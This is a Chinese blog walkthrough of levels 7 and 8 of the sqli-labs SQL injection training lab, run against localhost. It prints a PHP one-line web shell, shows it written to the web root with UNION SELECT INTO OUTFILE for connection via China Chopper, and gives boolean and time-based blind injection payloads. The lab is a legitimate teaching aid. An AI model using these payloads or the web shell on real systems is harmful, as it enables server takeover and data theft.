Linux下sql_labs第七关,sqli-labs(7-8关)

知识点:

1.phpstudy文件读写权限的问题:使用show variables like '%secure%';在命令行中查看secure-file-priy当前的值,如果显示NULL,则需要打开phpstudy\MySQL\my.ini文件,在其中加上一句:secure_file_priv="/"

1bde30038a194c7274f335e420bcc838.png

2.一句话木马(配合中国菜刀使用):php版本:<?php @eval($_POST['pass']);?>,pass为密码

3.into outfile函数,写文件,用法:select 'mysql is very good' into outfile 'text1.txt';或者是select 'mysql is very good' into outfile "写要保存的路径用\\"

文件位置:MySQL/data

4.load_file()函数,读取本地文件,用法:select load_file('写文件保存的路径')

5.if函数,if(condition,A,B),如果条件condition为true,则执行语句A,否则执行B

例如:select if(1>2,4,5),返回的结果是5(如果在mysql命令中使用,首先要use ×××数据库才可以)

13eece9a1210e0d4e9ac6fb9e72f90ed.png

第七关(Less-7):

1.根据提示输入http://127.0.0.1/sqli-labs-master/Less-7/?id=1,由回显结果提示知使用outfile函数

a2ba5b9f58f0f5404e2d8c2ad209fd8d.png

2.判断是否存在SQL注入,输入http://127.0.0.1/sqli-labs-master/Less-7/?id=1',报错,存在SQL注入

7ac82940a8f81c9048ece63a6ad5706a.png

3.通过多次判断可知,输入http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) --+,回显结果正确

52a0553cf87a0214cd199e115c7d76e3.png

4.由前几关可知有三列,使用联合查询union select,将一句话木马写入

3f17de134e83274cdb76ff4a95f7e3d3.png

5.查看保存的文件路径,查看是否写入成功(写入成功)

5c87904355369cbac77c8b0bae66f10a.png

6.先直接访问b.php,一句话是用php写的,所以不进行显示

e5338d997e0a4551088eeffb2470e88d.png

7.使用一句话与中国菜刀进行连接,打开中国菜刀右键添加,输入http://127.0.0.1/sqli-labs-master/Less-7/b.php,密码为pass,点击添加

c1d97ff7cea849e3633dd5e35a5c5b7c.png

8.打开如图中的地址,即可得到最终结果

3e523d92c9e1d869699562f1ae934bd2.png

43627240daef9abd993c832dff8e1ee4.png

第八关(Less-8):

方法一:布尔盲注(一位一位进行猜解)

1.根据提示输入http://127.0.0.1/sqli-labs-master/Less-8/?id=1,出现与之前关卡相同的You are in......

d15092b8ae02fb930c1a3139e6196d77.png

2.判断是否存在SQL注入漏洞,输入http://127.0.0.1/sqli-labs-master/Less-8/?id=1',You are in......消失,说明存在注入漏洞

fadeb21a0954de3e7a3005b02a1277d4.png

3.判断可知,输入http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+,回显正常,说明接下来应该这样儿进行构造

b1890e39dc8358eb360b55e1bab99bd0.png

4.判断列数,使用order by

51fd0c7eb1529505fd99e0be496b72de.png

5.将3改为4,出现如图所示结果,说明列数为三列

5c4b017b4ad9d2eae5c4ddbc05ea0f7c.png

6.使用left函数判断第一位是否是s,回显正常,说明第一位是s

0c1f44eef7528f1fe2fc0a13ee213c44.png

方法二:时间盲注

1.使用延迟的方法判断是否存在注入漏洞,使用sleep函数,无回显,说明存在注入漏洞

49be08560d46b9112144ffc64bbc3dc4.png

2.使用if函数对当前数据库(security库)的长度进行判断,输入http://127.0.0.1/sqli-labs-master/Less-8/?id=1'and if(length(database())=8,1,sleep(5))--+,length代表长度,当为8时,很快加载并有回显,说明当前数据库的长度为8。否则加载较慢(5s)。由此猜解出当前数据库长度为8

f1b88c0950fa01dda049c9f6702f12d3.png

3.猜解当前数据库的每一位与方法一相同 。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值